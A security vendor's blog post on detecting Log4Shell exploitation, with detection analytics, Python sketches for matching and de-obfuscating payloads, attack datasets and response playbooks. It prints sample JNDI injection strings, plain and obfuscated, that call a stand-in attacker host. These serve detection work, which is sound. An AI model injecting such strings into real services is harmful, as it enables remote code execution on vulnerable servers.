This blog is a part of Splunk's Log4j response. For additional resources, check out the Log4Shell Overview and Resources for Log4j Vulnerabilities page.
Like most cybersecurity teams, the Splunk Threat Research Team (STRT) has been heads-down attempting to understand, simulate, and detect the Log4j attack vector. This post shares detection opportunities STRT found in different stages of successful Log4Shell exploitation.
One week after the vulnerability's initial release, we are still learning of new developments in the Log4j vulnerabilities. At the time of writing, there are two publicly known CVEs (CVE-2021-44228 and CVE-2021-45046); the Splunk Security Content below is designed to cover exploitation attempts across both CVEs, including the recently released bypass technique.
We recorded a short demo setting up the Splunk Attack Range to simulate the attack. Using the data collected, we developed 13 new detections and 9 playbooks to help Splunk SOAR customers investigate and respond to this threat. A dashboard is also included to help threat hunters identify signs of payload injection in their environments, including obfuscated payloads.
The Log4Shell exploitation path creates two unique detection opportunities before the defender must resort to more standard cybersecurity approaches. In particular, the payload injection and outbound connection stages will have specific patterns which defenders can utilize to identify the initial stages of exploitation. This section also describes the challenges that affect each of these detection opportunities.
In the first step of the attack, adversaries submit malicious payloads to attempt exploitation. In their simplest form, these injection strings are easy to identify by searching for the JNDI lookup pattern, for example:
${jndi:ldap://attacker.com/evil}
The data sources that can be leveraged for this detection opportunity include web server logs, web and proxy logs, and API gateway logs. Using the CIM Web data model can be even more beneficial for defenders.
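As a rough illustration of the simplest case (this is not the detection shipped in Splunk Security Content), the Python sketch below scans a log line for an un-obfuscated JNDI lookup. The function name, the protocol list, and the sample log line are assumptions made for the example.

```python
import re

# Matches only the plain form, e.g. ${jndi:ldap://host/path}.
# The protocol list is an illustrative assumption, not an exhaustive set.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://[^}\s]+\}", re.IGNORECASE)

def find_plain_jndi(log_line):
    """Return every plain JNDI lookup string found in a log line."""
    return [m.group(0) for m in JNDI_PATTERN.finditer(log_line)]

# Hypothetical access-log line with the payload in the User-Agent field.
sample = '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.com/evil}"'
matches = find_plain_jndi(sample)
print(matches)
```

A pattern this strict only catches the plain form; obfuscated payloads need additional handling.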
As with many attack sequences, obfuscation can be a powerful tool. In this case, the payload string can be obfuscated in many different ways to bypass signature-based detection or prevention controls such as IDS, IPS, and WAF products. For example:
${${env:FOO:-j}ndi${env:FOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/evil}
Regular expressions can help reduce false negatives but will not provide coverage for all possible variations.
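One way to complement pattern matching is to normalize a payload before checking it. The sketch below is a simplified, hypothetical normalizer: it repeatedly collapses innermost lookups, replacing `${name:key:-default}` with its default value and `${lower:x}` or `${upper:x}` with `x`. It assumes the default value is always used, which is not how Log4j behaves when the referenced variable actually exists, and it covers only these obfuscation styles.

```python
import re

# Innermost ${...} expression: its body contains no "$", "{" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

def _resolve(match):
    body = match.group(1)
    # ${env:FOO:-j} or ${::-j}: assume the default after ":-" is used.
    if ":-" in body:
        return body.split(":-", 1)[1]
    # ${lower:J} / ${upper:j}: keep the argument (case is ignored later).
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() in ("lower", "upper"):
        return rest
    # Anything else (including ${jndi:...}) is left untouched.
    return match.group(0)

def normalize(payload, max_passes=10):
    """Collapse nested lookups until the string stops changing."""
    for _ in range(max_passes):
        resolved = INNER_LOOKUP.sub(_resolve, payload)
        if resolved == payload:
            break
        payload = resolved
    return payload

def looks_like_jndi(payload):
    return "${jndi:" in normalize(payload).lower()

obfuscated = "${${env:FOO:-j}ndi${env:FOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/evil}"
print(normalize(obfuscated))
```

Normalizing first keeps the final check simple, but new obfuscation variants will still slip past a fixed set of rules like this one.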
Although the initial attack vectors mostly target web servers and inject malicious payloads in common headers (e.g., User-Agent or X-Forwarded-For), there may be vulnerable endpoints for which logs are typically not retained (e.g., POST requests). Furthermore, CVE-2021-44228 affects not only web servers but any network service that uses the vulnerable package.
Adversaries are attempting to identify vulnerable servers and services through indiscriminate “spraying” of injection strings at visible endpoints rather than through deliberate identification of software containing the vulnerable package. Thus, defenders triaging alerts based only on injection string presence may encounter high false positive rates for injection attempts that may never result in code execution.
Successful exploitation requires the victim endpoint to make outbound connections to attacker-controlled infrastructure. To help identify compromised hosts, defenders can hunt for unusual outbound network connections that originate from servers using Log4j libraries and that use protocols such as LDAP or RMI.
Web proxy logs, firewall logs, and NetFlow provide useful data for identifying these outbound connections. To accelerate identification of attacker activity within these sources, the CIM Web, Endpoint, and Traffic data models can be used.
Even modestly sized IT environments routinely generate legitimate outbound connections, so determining whether a given connection is legitimate is no less complicated here than usual. Strong a priori baselining procedures, or quantified measures of outbound connections relative to internal requests, will prove useful in this analysis. This becomes more complicated when applications are cloud hosted or sit outside the typical corporate DMZ.
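To make the baselining idea concrete, here is a minimal Python sketch under stated assumptions: the event field names (`src`, `dest`, `dest_port`), the baseline set, and the sample addresses are all hypothetical, and the watched ports are simply the default ports for LDAP (389), LDAPS (636), and the RMI registry (1099).

```python
# Default ports for LDAP, LDAPS, and the RMI registry.
WATCHED_PORTS = {389, 636, 1099}

def new_outbound_connections(events, baseline):
    """Return watched-port events whose (src, dest) pair is not in the baseline."""
    findings = []
    for event in events:
        pair = (event["src"], event["dest"])
        if event["dest_port"] in WATCHED_PORTS and pair not in baseline:
            findings.append(event)
    return findings

# Hypothetical baseline: this server normally talks to one internal directory server.
baseline = {("10.0.1.20", "10.0.0.5")}

events = [
    {"src": "10.0.1.20", "dest": "10.0.0.5", "dest_port": 389},      # known pair
    {"src": "10.0.1.20", "dest": "203.0.113.10", "dest_port": 1099}, # new pair, RMI port
    {"src": "10.0.1.20", "dest": "198.51.100.7", "dest_port": 443},  # not a watched port
]

findings = new_outbound_connections(events, baseline)
print(findings)
```

Because attackers can serve LDAP or RMI on arbitrary ports, a port filter like this narrows the hunt but does not replace a broader baseline of outbound destinations.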
If successful exploitation is achieved, the Log4Shell CVE-2021-44228 vulnerability allows adversaries to obtain code execution in target networks. They are, however, still forced to engage in post-exploitation techniques to expand their access and locate/exfiltrate their objectives.
The data sources that can be leveraged for this detection opportunity include process and command-line logging, PowerShell logging, file system audit logging, and network logging. Using the CIM Endpoint and Traffic data models can be even more beneficial for defenders.
Splunk encourages defenders to deploy post-exploitation detection coverage to detect adversaries that have obtained an initial foothold using Log4Shell or any other method. STRT has released several analytic stories that can help with this task including: Active Directory Discovery, Windows Privilege Escalation, Active Directory Lateral Movement and many others.
To better understand the Log4Shell CVE-2021-44228 vulnerability and to build testable detections, STRT replicated the attack chain using Splunk’s Attack Range. This section will walk you through the steps and requirements needed to test this yourself.
Here is a high-level diagram of the replication of a vulnerable environment:
Watch the video below to see the attack in action.
The above POC shows how to compromise a host by exploiting the CVE-2021-44228 vulnerability. However, exploiting this vulnerability in the field requires several conditions and may not be as straightforward as the POCs shared in the community (i.e., the vulnerable class information is disclosed in POC code).
To build our detections, we replicated the attack against both Windows and Linux vulnerable servers and executed different payloads, such as command execution and reverse shells. Below are the attack datasets we generated by simulating Log4Shell.
Defenders who are not able to simulate the attack can use these datasets to test detection logic in their own environments. The datasets can be replayed to Splunk Enterprise by using STRT’s replay.py tool or the UI.
Sourcetypes | Description | URLs |
Microsoft-Windows-Sysmon/Operational, WinEventLog:Security, Sysmon_linux | Manual exploitation of CVE-2021-44228-Log4j on a Linux and Windows endpoint. | |
bro:conn:json | Manual generation of attack data by creating outbound LDAP connections. | |
nginx:plus:kv | Manual generation of attack data related to Log4j with Nginx proxy logs. | |
stream:ip | Manual generation of attack data related to Log4j with network logs. | |
stream:http, nginx:plus:kv, sysmon_linux | Attack data related to Log4Shell CVE-2021-44228. | |
STRT developed a new analytic story to help security operations center (SOC) analysts detect adversaries exploiting, or trying to exploit, the Log4j CVE-2021-44228 vulnerability. An analytic story is a group of detections and responses built to detect, investigate, and respond to specific threats. This section describes some of these analytics, grouped by exploitation step.
Payload Injection
Name | Technique ID | Tactic | Description |
T1190 | Initial Access | CVE-2021-44228 Log4Shell payloads can be injected using various methods, but one of the most common injection vectors is via web calls. Many of the vulnerable Java web applications that use Log4j have a web component, making them special targets for this injection. Examples include Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the Log4j package. Its invocation is similar to ${jndi:ldap://PAYLOAD_INJECTED}. When executed against vulnerable web applications, the invocation can be seen in various parts of weblogs. | |
T1190 | Initial Access | This detection correlates the previous analytic with outbound network connections coming from the same host. This will reduce the number of false positives and potentially identify successfully exploited servers. |
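The correlation idea in the second analytic can be sketched in a few lines of Python. This is an illustration under stated assumptions, not the published search: the field names, the five-minute window, and the sample events are hypothetical.

```python
from datetime import datetime, timedelta

def correlate(injections, outbound, window=timedelta(minutes=5)):
    """Pair each injection attempt with outbound connections that the targeted
    host opens within `window` after the attempt."""
    hits = []
    for inj in injections:
        for conn in outbound:
            delay = conn["time"] - inj["time"]
            if conn["src"] == inj["dest"] and timedelta(0) <= delay <= window:
                hits.append((inj["dest"], conn["dest"], delay))
    return hits

# Hypothetical events: one injection attempt against 10.0.1.20, followed by
# one outbound connection seconds later and another much later.
injections = [{"time": datetime(2021, 12, 14, 10, 0, 0), "dest": "10.0.1.20"}]
outbound = [
    {"time": datetime(2021, 12, 14, 10, 0, 3), "src": "10.0.1.20", "dest": "203.0.113.10"},
    {"time": datetime(2021, 12, 14, 11, 30, 0), "src": "10.0.1.20", "dest": "198.51.100.7"},
]

hits = correlate(injections, outbound)
print(hits)
```

Requiring both signals from the same host is what cuts down the noise from indiscriminate spraying; the window size is a tuning choice.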
Outbound Connections
Name | Technique ID | Tactic | Description |
T1190 | Initial Access | A required step in exploiting the CVE-2021-44228 Log4j vulnerability is that the victim server performs outbound connections to attacker-controlled infrastructure. This is required as part of the JNDI lookup as well as for retrieving the second-stage .class payload. The following analytic identifies a Java process reaching out to default ports used by the LDAP and RMI protocols. This behavior could represent successful exploitation. Note that adversaries can easily decide to use arbitrary ports for these protocols and potentially bypass this detection. | |
T1190 | Initial Access | Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space. | |
T1190 | Initial Access | Identifies a Java user agent performing a GET request for a .class file from the remote site. This potentially indicates exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). |
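For readers who want to prototype the RFC1918 check outside Splunk, a minimal Python sketch follows. The field names (`dest_ip`, `dest_port`) and the sample records are assumptions for the example, and only IPv4 is handled.

```python
import ipaddress

# The three private IPv4 ranges defined by RFC 1918.
RFC1918 = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]
LDAP_PORTS = {389, 636}  # default LDAP and LDAPS ports

def is_rfc1918(address):
    ip = ipaddress.ip_address(address)
    return any(ip in net for net in RFC1918)

def external_ldap(connections):
    """Return LDAP connections whose destination is outside RFC1918 space."""
    return [
        c for c in connections
        if c["dest_port"] in LDAP_PORTS and not is_rfc1918(c["dest_ip"])
    ]

# Hypothetical connection records.
connections = [
    {"src_ip": "10.0.1.20", "dest_ip": "10.0.0.5", "dest_port": 389},
    {"src_ip": "10.0.1.20", "dest_ip": "203.0.113.10", "dest_port": 389},
    {"src_ip": "10.0.1.20", "dest_ip": "172.32.0.1", "dest_port": 636},
]

flagged = external_ldap(connections)
print(flagged)
```

Note that 172.32.0.1 is flagged: the 172.16.0.0/12 range ends at 172.31.255.255, which is an easy boundary to get wrong in hand-written filters.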
Post-Exploitation
Name | Technique ID | Tactic | Description |
T1059.001 | Execution | The following analytic identifies the use of PowerShell to download a file using the DownloadFile method. This particular method is utilized in many different PowerShell frameworks to download files and output them to disk. Identify the source (IP/domain) and destination file and triage appropriately. | |
T1059.003 | Execution | The following analytic identifies command-line arguments where cmd.exe /c is used to execute a program. cmd /c is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly used by adversaries and malware to execute batch commands using different shells like PowerShell or different processes other than cmd.exe. | |
T1105 | Command And Control | The following analytic identifies the use of curl on Linux or macOS to attempt to download a file from a remote source and pipe it to Bash. This is typically found with coin miners and most recently with CVE-2021-44228, a vulnerability in Log4j. | |
T1190 | Initial Access | The following analytic identifies the process name of Java, Apache, or Tomcat spawning a Linux shell. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). The shells included in the macro are "sh", "ksh", "zsh", "bash", "dash", "rbash", "fish", "csh", "tcsh", "ion", "eshell". Upon triage, review parallel processes and command-line arguments to determine legitimacy. | |
Malicious PowerShell Process - Connect To Internet With Hidden Window | T1190 | Initial Access | The following hunting analytic identifies PowerShell commands utilizing the WindowStyle parameter to hide the window on the compromised endpoint. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet. | |
T1105 | Command And Control | The following analytic identifies the use of wget on Linux or macOS to attempt to download a file from a remote source and pipe it to Bash. This is typically found with coin miners and most recently with CVE-2021-44228, a vulnerability in Log4j. | |
T1190 | Initial Access | The following analytic identifies the process name of java.exe and w3wp.exe spawning a Windows shell. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). The shells included in the macro are "cmd.exe" and "powershell.exe". |
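The two "spawning a shell" analytics share one idea: a Java-related parent process should rarely launch an interactive shell. A simplified Python sketch is shown below. The shell lists come from the descriptions above; matching parents by name prefix and the function name itself are assumptions for illustration.

```python
# Shell names taken from the analytic descriptions above.
LINUX_SHELLS = {"sh", "ksh", "zsh", "bash", "dash", "rbash", "fish",
                "csh", "tcsh", "ion", "eshell"}
WINDOWS_SHELLS = {"cmd.exe", "powershell.exe"}
SHELLS = LINUX_SHELLS | WINDOWS_SHELLS

# Assumption: parents are matched by name prefix (java, java.exe, apache2, ...).
PARENT_PREFIXES = ("java", "apache", "tomcat", "w3wp")

def is_suspicious_spawn(parent_name, child_name):
    """True when a Java-related parent process spawns a known shell."""
    parent = parent_name.lower()
    child = child_name.lower()
    return parent.startswith(PARENT_PREFIXES) and child in SHELLS

print(is_suspicious_spawn("java", "bash"))
print(is_suspicious_spawn("sshd", "bash"))
```

Legitimate applications sometimes shell out as well, so a match is a triage lead rather than proof of compromise.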
Included in the analytic story is a Splunk hunting dashboard that helps to quickly assess CVE-2021-44228 (Log4Shell) activity mapped to the Web data model. Because exploitation requires the injection string to appear in the logs, the dashboard helps identify the activity anywhere in the HTTP headers by using the raw field. It is also easy to modify the analytic to apply the same pattern matching to other log sources. Scoring is based on a simple rubric of 0-5, with 5 being the best match. A score below 5 is meant to identify additional patterns that will equate to a higher total score.
A breakdown of the eval statements:
Scoring will then occur based on any findings. The base score is meant to be 2, created by jndi_fastmatch. Everything else is meant to raise the score.
Finally, a simple table is created to show the scoring and the raw field itself. Filter based on score or columns of interest.
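The scoring approach can be sketched outside of SPL as well. In the Python example below, only the `jndi_fastmatch` name and its base score of 2 come from the description above; the regular expressions, the other two indicators, and their weights are hypothetical stand-ins, and the total is capped at 5 to match the rubric.

```python
import re

# (name, pattern, weight). Only jndi_fastmatch and its weight of 2 are taken
# from the text; every pattern and the other indicators are hypothetical.
INDICATORS = [
    ("jndi_fastmatch", re.compile(r"jndi", re.IGNORECASE), 2),
    ("jndi_proto", re.compile(r"jndi:(ldaps?|rmi|dns)://", re.IGNORECASE), 2),
    ("env_lookup", re.compile(r"\$\{env:", re.IGNORECASE), 1),
]
MAX_SCORE = 5

def score(raw):
    """Sum the weights of every matching indicator, capped at MAX_SCORE."""
    total = sum(weight for _, pattern, weight in INDICATORS if pattern.search(raw))
    return min(total, MAX_SCORE)

# Hypothetical raw events.
rows = [
    "GET /index.html HTTP/1.1",
    "User-Agent: ${jndi:ldap://attacker.com/evil}",
    "User-Agent: ${jndi:ldap://${env:USER}.attacker.com/evil}",
]
table = [(score(raw), raw) for raw in rows]
for entry in table:
    print(entry)
```

Keeping each indicator as a separate named entry makes it straightforward to add or reweight patterns as new payload variants appear.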
We hope teams find this useful to quickly assess datasets and modify them as needed.
Name | Technique ID | Tactic | Description |
Hunt for Log4Shell activity in logs. |
If your infrastructure has matured to support automation, Splunk has released nine playbooks for investigating and responding to the Log4Shell vulnerability (CVE-2021-44228). While there is no substitute for timely patch management and secure software supply chain practices, these response playbooks can fill gaps in time-sensitive scenarios such as this one. Here is a diagram of how those playbooks fit together:
Playbook | Description |
This is the parent playbook that manages the IPs and hostnames of potentially affected hosts and calls the appropriate sub-playbooks for each one. | |
Use data already in your Splunk Enterprise environment to help investigate and remediate impacts caused by this vulnerability. | |
Use SSH and Bash to investigate each internal Unix host that might be running Java with Log4j. No response actions are taken on the host, but information is gathered about the Java version in use, the presence of JndiLookup.class in any JARs, the presence of Log4j JARs in any WARs, and the presence of any running Java processes. The results are zipped up in .csv files and added to the vault for an analyst to review. | |
Use SSH and Bash to collect generic information about the activity on each relevant Unix system that is not specific to Log4j. This includes the process list, installed services, login history, cron jobs, and open sockets. The results are zipped up in .csv files and added to the vault for an analyst to review. | |
Use WinRM and PowerShell to scan each Windows system for the presence of a "JndiLookup.class" file in any JAR files on any drives. The presence of that string in the zip manifest could indicate a Log4j vulnerability. | |
Use WinRM and PowerShell to perform a general investigation on key aspects of each Windows system. This includes users, groups, running processes, open sockets, startup commands, and scheduled tasks. The results are zipped up in .csv files and added to the vault for an analyst to review. | |
The parent playbook for the two response playbooks. This is where we determine what hosts to attempt to mitigate using SSH and WinRM. | |
Use SSH and Bash to perform mitigation on each host. If filenames are provided, the endpoints will be searched and then the user can approve deletion. Regardless of file deletion, the user is then prompted to quarantine the endpoint with an iptables rule or shut down the endpoint. | |
Use WinRM and PowerShell to perform mitigation on each host. If filenames are provided, the endpoints will be searched and then the user can approve deletion. Regardless of file deletion, the user is then prompted to quarantine the endpoint with a Windows firewall rule or shut down the endpoint. |
As usual, playbooks rely on SOAR app connectors to perform their actions. In this case, the apps are Splunk, SSH, and WinRM. Please see the in-product app documentation to configure these apps. If you use CrowdStrike, Carbon Black, Windows Defender, SentinelOne, or any other endpoint security solution, you may be able to convert these playbooks to use the live response capabilities of those tools instead of SSH and WinRM.
There are two ways to trigger these playbooks. The first is to use a custom list, which is the equivalent of a spreadsheet embedded in Splunk SOAR. The default name of this custom list is “log4j_hosts” and the expected format is the IP or hostname of the internal potentially affected host in the first column, and the operating system family (“unix” or “windows”) in the second column. Here is an example:
hostname1 | unix |
1.1.1.1 | windows |
hostname2 | unix |
Once the custom list is configured, you can start a blank event in Splunk SOAR and launch the playbook “log4j_investigate” to kick off the process. This will create the required artifacts at the beginning of the first playbook.
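Before loading a large host inventory into the custom list, it can help to sanity-check the rows. The Python sketch below validates the two-column format described above; it is a standalone helper written for illustration and does not call any Splunk SOAR API.

```python
VALID_OS = {"unix", "windows"}

def validate_rows(rows):
    """Return (row_number, problem) tuples for rows that break the
    host / operating-system-family format."""
    problems = []
    for number, row in enumerate(rows, start=1):
        if len(row) < 2 or not row[0].strip():
            problems.append((number, "missing host or operating system family"))
        elif row[1].strip() not in VALID_OS:
            problems.append((number, "unknown operating system family: %r" % row[1]))
    return problems

# Hypothetical rows; the last one uses an unsupported family value.
rows = [
    ["hostname1", "unix"],
    ["1.1.1.1", "windows"],
    ["hostname2", "linux"],
]
problems = validate_rows(rows)
print(problems)
```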
The second way to trigger these playbooks is to forward a notable or alert to Splunk SOAR from Splunk. You can manually send an alert using the following command at the end of your search.
| sendalert sendtophantom param.phantom_server="phantom" param.sensitivity="amber" param.severity="Medium" param.label="events"
Replace the phantom_server parameter value with the name of your Splunk SOAR instance as configured in the Phantom App For Splunk. Ensure that you have the “deviceHostname” field, which is required for the playbooks, and if possible, provide the “operatingSystemFamily” field, which should be either “unix” or “windows”.
You may notice that the “log4j_respond” playbook is executed automatically at the end of “log4j_investigate”. However, that playbook runs from a slightly different custom list called “log4j_hosts_and_files”. If you determine that you want to do bulk remediation, you can create that custom list as well and either launch “log4j_respond” in the same container or create a new one just for the response. In “log4j_hosts_and_files” you can use the same format, except there is an optional third column with full paths to files marked for deletion. Of course, all response actions are preceded by prompts that will wait for confirmation by an analyst.
It is awe-inspiring to see our industry collaborate to address this vulnerability. Even inside Splunk, it has been a multi-team, multi-evening effort. Our SURGe team provided customer guidance within 24 hours of the attack. Our internal security team published an advisory of our affected products within three days of the event. Security Field Solutions collaborated with STRT to build playbooks while we focused on simulating the attack and shipping Enterprise Security Content Update 3.32.0.
On a final note, Yahoo has released a tool that checks if a host is vulnerable to Log4j (CVE-2021-44228) exploitation, and our very own James Brodsky successfully operationalized it via a Splunk Technology Add-On called TA-check-logFORj. The wrapper Brodsky created simply plugs the Yahoo tool into the Splunk Universal Forwarder (on Linux) so that you can report on the results of the tool across your entire UF fleet. Thank you, Jan Schaumann and James Brodsky, for sharing this with the Splunk community!
I would like to extend some special thanks to: Matthew Modestino, Tim Meader, Christophe Tafani-Dereeper, Florian Roth, Olaf Hartong, Johan Bjerke, Kelby Shelton, Philip Royer, and Kevin Beaumont. Without your contributions this blog would not be possible!